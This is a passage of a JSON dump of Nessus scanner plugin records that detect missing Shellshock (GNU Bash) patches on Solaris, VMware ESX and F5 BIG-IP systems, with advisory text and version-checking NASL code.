script_copyright(english:\"This script is Copyright (C) 
2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"rt42>=4.2.0<4.2.8\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:58:13", "description": "The remote Solaris system is missing necessary patches to address critical security updates related to 'Shellshock' :\n\n - GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the 'mod_cgi' and 'mod_cgid' modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, also known as 'Shellshock.' Note that the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix. 
(CVE-2014-6271)\n\n - GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access, and untrusted-pointer read and write operations) via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the 'mod_cgi' and 'mod_cgid' modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. Note that this vulnerability exists because of an incomplete fix for CVE-2014-6271 and CVE-2014-7169. (CVE-2014-6277)\n\n - GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary commands via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the 'mod_cgi' and 'mod_cgid' modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. Note that this vulnerability exists because of an incomplete fix for CVE-2014-6271, CVE-2014-7169, and CVE-2014-6277.\n (CVE-2014-6278)\n\n - GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have other unknown impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the 'mod_cgi' and 'mod_cgid' modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. 
Note that this vulnerability exists because of an incomplete fix for CVE-2014-6271. (CVE-2014-7169)\n\n - The redirection implementation in 'parse.y' in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have other unspecified impact via crafted use of 'here' documents, also known as the 'redir_stack' issue. (CVE-2014-7186)\n\n - An off-by-one error in the 'read_token_word' function in 'parse.y' in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have other unspecified impact via deeply nested for-loops, also known as the 'word_lineno' issue.\n (CVE-2014-7187)", "cvss3": {"score": null, "vector": null}, "published": "2014-10-13T00:00:00", "type": "nessus", "title": "Oracle third party patch update : bash_2014_10_07", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:oracle:solaris"], "id": "SOLARIS11_BASH_2014_10_07.NASL", "href": "https://www.tenable.com/plugins/nessus/78395", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Oracle Third Party software advisories.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78395);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", 
value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Oracle third party patch update : bash_2014_10_07\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Solaris system is missing a security patch for third party\nsoftware.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Solaris system is missing necessary patches to address\ncritical security updates related to 'Shellshock' :\n\n - GNU Bash through 4.3 processes trailing strings after\n function definitions in the values of environment\n variables, which allows remote attackers to execute\n arbitrary code via a crafted environment, as\n demonstrated by vectors involving the ForceCommand\n feature in OpenSSH sshd, the 'mod_cgi' and 'mod_cgid'\n modules in the Apache HTTP Server, scripts executed by\n unspecified DHCP clients, and other situations in which\n setting the environment occurs across a privilege\n boundary from Bash execution, also known as\n 'Shellshock.' Note that the original fix for this issue\n was incorrect; CVE-2014-7169 has been assigned to cover\n the vulnerability that is still present after the\n incorrect fix. 
(CVE-2014-6271)\n\n - GNU Bash through 4.3 bash43-026 does not properly parse\n function definitions in the values of environment\n variables, which allows remote attackers to execute\n arbitrary code or cause a denial of service\n (uninitialized memory access, and untrusted-pointer\n read and write operations) via a crafted environment,\n as demonstrated by vectors involving the ForceCommand\n feature in OpenSSH sshd, the 'mod_cgi' and 'mod_cgid'\n modules in the Apache HTTP Server, scripts executed by\n unspecified DHCP clients, and other situations in which\n setting the environment occurs across a privilege\n boundary from Bash execution. Note that this\n vulnerability exists because of an incomplete fix for\n CVE-2014-6271 and CVE-2014-7169. (CVE-2014-6277)\n\n - GNU Bash through 4.3 bash43-026 does not properly parse\n function definitions in the values of environment\n variables, which allows remote attackers to execute\n arbitrary commands via a crafted environment, as\n demonstrated by vectors involving the ForceCommand\n feature in OpenSSH sshd, the 'mod_cgi' and 'mod_cgid'\n modules in the Apache HTTP Server, scripts executed by\n unspecified DHCP clients, and other situations in which\n setting the environment occurs across a privilege\n boundary from Bash execution. 
Note that this\n vulnerability exists because of an incomplete fix for\n CVE-2014-6271, CVE-2014-7169, and CVE-2014-6277.\n (CVE-2014-6278)\n\n - GNU Bash through 4.3 bash43-025 processes trailing\n strings after certain malformed function definitions in\n the values of environment variables, which allows remote\n attackers to write to files or possibly have other\n unknown impact via a crafted environment, as\n demonstrated by vectors involving the ForceCommand\n feature in OpenSSH sshd, the 'mod_cgi' and 'mod_cgid'\n modules in the Apache HTTP Server, scripts executed by\n unspecified DHCP clients, and other situations in which\n setting the environment occurs across a privilege\n boundary from Bash execution. Note that this\n vulnerability exists because of an incomplete fix for\n CVE-2014-6271. (CVE-2014-7169)\n\n - The redirection implementation in 'parse.y' in GNU Bash\n through 4.3 bash43-026 allows remote attackers to cause\n a denial of service (out-of-bounds array access and\n application crash) or possibly have other unspecified\n impact via crafted use of 'here' documents, also known\n as the 'redir_stack' issue. 
(CVE-2014-7186)\n\n - An off-by-one error in the 'read_token_word' function in\n 'parse.y' in GNU Bash through 4.3 bash43-026 allows\n remote attackers to cause a denial of service\n (out-of-bounds array access and application crash) or\n possibly have other unspecified impact via deeply\n nested for-loops, also known as the 'word_lineno' issue.\n (CVE-2014-7187)\");\n # https://www.oracle.com/technetwork/topics/security/thirdparty-patch-map-1482893.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4a913f44\");\n script_set_attribute(attribute:\"see_also\", value:\"https://getupdates.oracle.com/readme/149080-02\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/2014/09/cve-2014-6271/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.oracle.com/patch/entry/solaris_idrs_available_on_mos\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the Solaris system to version SRU 11.2.2.8.0.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Solaris Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris11/release\", \"Host/Solaris11/pkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Solaris11/release\");\nif (isnull(release)) audit(AUDIT_OS_NOT, \"Solaris11\");\npkg_list = solaris_pkg_list_leaves();\nif (isnull (pkg_list)) audit(AUDIT_PACKAGE_LIST_MISSING, \"Solaris pkg-list packages\");\n\nflag = 0;\n\nif (preg(string:pkg_list, pattern:\"(^|\\n)bash(\\n|$)\", multiline:TRUE))\n{\n if (solaris_check_release(release:\"0.5.11-0.175.2.2.0.8.0\", sru:\"SRU 11.2.2.8.0\") > 0) flag++;\n}\nelse audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n\nif (flag)\n{\n error_extra = 'Affected package : bash\\n' + solaris_get_report2();\n error_extra = ereg_replace(pattern:\"version\", replace:\"OS version\", string:error_extra);\n if (report_verbosity > 0) security_hole(port:0, extra:error_extra);\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_PACKAGE_NOT_AFFECTED, \"bash\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2022-05-04T23:57:45", "description": "a. Bash update for multiple products.\n\n Bash libraries have been updated in multiple products to resolve multiple critical security issues, also referred to as Shellshock.\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the identifiers CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, and CVE-2014-6278 to these issues.\n\n VMware products have been grouped into the following four product categories :\n I) ESXi and ESX Hypervisor\n ESXi is not affected because ESXi uses the Ash shell (through busybox), which is not affected by the vulnerability reported for the Bash shell.\n ESX has an affected version of the Bash shell. See table 1 for remediation for ESX.\n II) Windows-based products\n Windows-based products, including all versions of vCenter Server running on Windows, are not affected.\n\n III) VMware (virtual) appliances\n VMware (virtual) appliances ship with an affected version of Bash. See table 2 for remediation for appliances.\n IV) Products that run on Linux, Android, OSX or iOS (excluding virtual appliances)\n\n Products that run on Linux, Android, OSX or iOS (excluding virtual appliances) might use the Bash shell that is part of the operating system. If the operating system has a vulnerable version of Bash, the Bash security vulnerability might be exploited through the product. VMware recommends that customers contact their operating system vendor for a patch.\n\n MITIGATIONS\n\n VMware encourages restricting access to appliances through firewall rules and other network layer controls to only trusted IP addresses. This measure will greatly reduce any risk to these appliances.\n\n RECOMMENDATIONS\n\n VMware recommends customers evaluate and deploy patches for affected products in Tables 1 and 2 below as these patches become available. 
\n\n For several products, both a patch and a product update are available.\n In general, if a patch is made available, the patch must be applied to the latest version of the appliance.\n\n Customers should refer to the specific product Knowledge Base articles listed in Section 4 to understand the type of remediation available and applicable appliance version numbers.\n\n Column 4 of the following tables lists the action required to remediate the vulnerability in each release, if a solution is available.\n\n Table 1 - ESXi and ESX Hypervisor =================================", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-10-02T00:00:00", "type": "nessus", "title": "VMSA-2014-0010 : VMware product updates address critical Bash security vulnerabilities (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:vmware:esx:4.0", "cpe:/o:vmware:esx:4.1"], "id": "VMWARE_VMSA-2014-0010.NASL", "href": "https://www.tenable.com/plugins/nessus/78025", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from VMware Security Advisory 2014-0010. 
\n# The text itself is copyright (C) VMware Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78025);\n script_version(\"1.37\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"VMSA\", value:\"2014-0010\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"VMSA-2014-0010 : VMware product updates address critical Bash security vulnerabilities (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote VMware ESX host is missing a security-related patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"a. Bash update for multiple products.\n\n Bash libraries have been updated in multiple products to resolve \n multiple critical security issues, also referred to as Shellshock.\n \n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the identifiers CVE-2014-6271, CVE-2014-7169, \n CVE-2014-7186, and CVE-2014-7187, CVE-2014-6277, CVE-2014-6278 \n to these issues.\n\n VMware products have been grouped into the following four\n product categories :\n \n I) ESXi and ESX Hypervisor\n ESXi is not affected because ESXi uses the Ash shell (through\n busybox), which is not affected by the vulnerability reported\n for the Bash shell.\n ESX has an affected version of the Bash shell. See table 1 for\n remediation for ESX.\n \n II) Windows-based products\n Windows-based products, including all versions of vCenter Server \n running on Windows, are not affected.\n\n III) VMware (virtual) appliances\n VMware (virtual) appliances ship with an affected version of Bash. 
\n See table 2 for remediation for appliances.\n \n IV) Products that run on Linux, Android, OSX or iOS (excluding \n virtual appliances)\n\n Products that run on Linux, Android, OSX or iOS (excluding \n virtual appliances) might use the Bash shell that is part of the\n operating system. If the operating system has a vulnerable\n version of Bash, the Bash security vulnerability might be\n exploited through the product. VMware recommends that customers\n contact their operating system vendor for a patch. \n \n MITIGATIONS\n\n VMware encourages restricting access to appliances through\n firewall rules and other network layer controls to only trusted IP\n addresses. This measure will greatly reduce any risk to these\n appliances.\n\n RECOMMENDATIONS\n\n VMware recommends customers evaluate and deploy patches for\n affected products in Table 1 and 2 below as these\n patches become available. \n\n For several products, both a patch and a product update are\navailable.\n In general, if a patch is made available, the patch must be applied \n to the latest version of the appliance.\n\n Customers should refer to the specific product Knowledge Base\narticles \n listed in Section 4 to understand the type of remediation available\nand \n applicable appliance version numbers.\n\n Column 4 of the following tables lists the action required to\n remediate the vulnerability in each release, if a solution is\n available.\n\n Table 1 - ESXi and ESX Hypervisor\n =================================\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.vmware.com/pipermail/security-announce/2014/000278.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the missing patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:4.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:4.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"VMware ESX Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/VMware/release\", \"Host/VMware/version\");\n script_require_ports(\"Host/VMware/esxupdate\", \"Host/VMware/esxcli_software_vibs\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"vmware_esx_packages.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/VMware/release\")) audit(AUDIT_OS_NOT, \"VMware ESX / ESXi\");\nif (\n !get_kb_item(\"Host/VMware/esxcli_software_vibs\") &&\n !get_kb_item(\"Host/VMware/esxupdate\")\n) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ninit_esx_check(date:\"2014-09-30\");\nflag = 0;\n\n\nif (esx_check(ver:\"ESX 4.0\", patch:\"ESX400-201410401-SG\")) flag++;\n\nif (esx_check(ver:\"ESX 4.1\", patch:\"ESX410-201410401-SG\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:esx_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:57:47", "description": "GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-10-10T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : Multiple GNU Bash vulnerabilities (SOL15629) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", 
"CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/h:f5:big-ip", "cpe:/h:f5:big-ip_protocol_security_manager"], "id": "F5_BIGIP_SOL15629.NASL", "href": "https://www.tenable.com/plugins/nessus/78197", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution SOL15629.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78197);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"F5 Networks BIG-IP : Multiple GNU Bash vulnerabilities (SOL15629) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"GNU Bash through 4.3 processes trailing strings after function\ndefinitions in the values of environment variables, which allows\nremote attackers to execute arbitrary 
code via a crafted environment,\nas demonstrated by vectors involving the ForceCommand feature in\nOpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP\nServer, scripts executed by unspecified DHCP clients, and other\nsituations in which setting the environment occurs across a privilege\nboundary from Bash execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.f5.com/labs\");\n # https://devcentral.f5.com/articles/3-ways-to-use-big-ip-asm-to-mitigate-shellshock\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d8374474\");\n script_set_attribute(attribute:\"see_also\", value:\"https://devcentral.f5.com/articles/cve-2014-6271-shellshocked\");\n # https://devcentral.f5.com/articles/shellshock-mitigation-with-big-ip-irules\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?658e7e22\");\n # https://devcentral.f5.com/articles/shellshock-mitigation-with-linerate-proxy\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?48d59554\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.f5.com/csp/article/K15629\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution SOL15629.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment 
Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"SOL15629\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.3.0-11.5.1\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"11.6.0HF1\",\"11.5.2-11.5.3\",\"11.5.1HF5\",\"11.5.0HF5\",\"11.4.1HF5\",\"11.4.0HF8\",\"11.3.0HF10\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.4.0-11.5.1\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"11.6.0HF1\",\"11.5.2-11.5.3\",\"11.5.1HF5\",\"11.5.0HF5\",\"11.4.1HF5\",\"11.4.0HF8\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.1\",\"10.1.0-10.2.4\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"11.6.0HF1\",\"11.5.2-11.5.3\",\"11.5.1HF5\",\"11.5.0HF5\",\"11.4.1HF5\",\"11.4.0HF8\",\"11.3.0HF10\",\"11.2.1HF12\",\"10.2.4HF9\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = 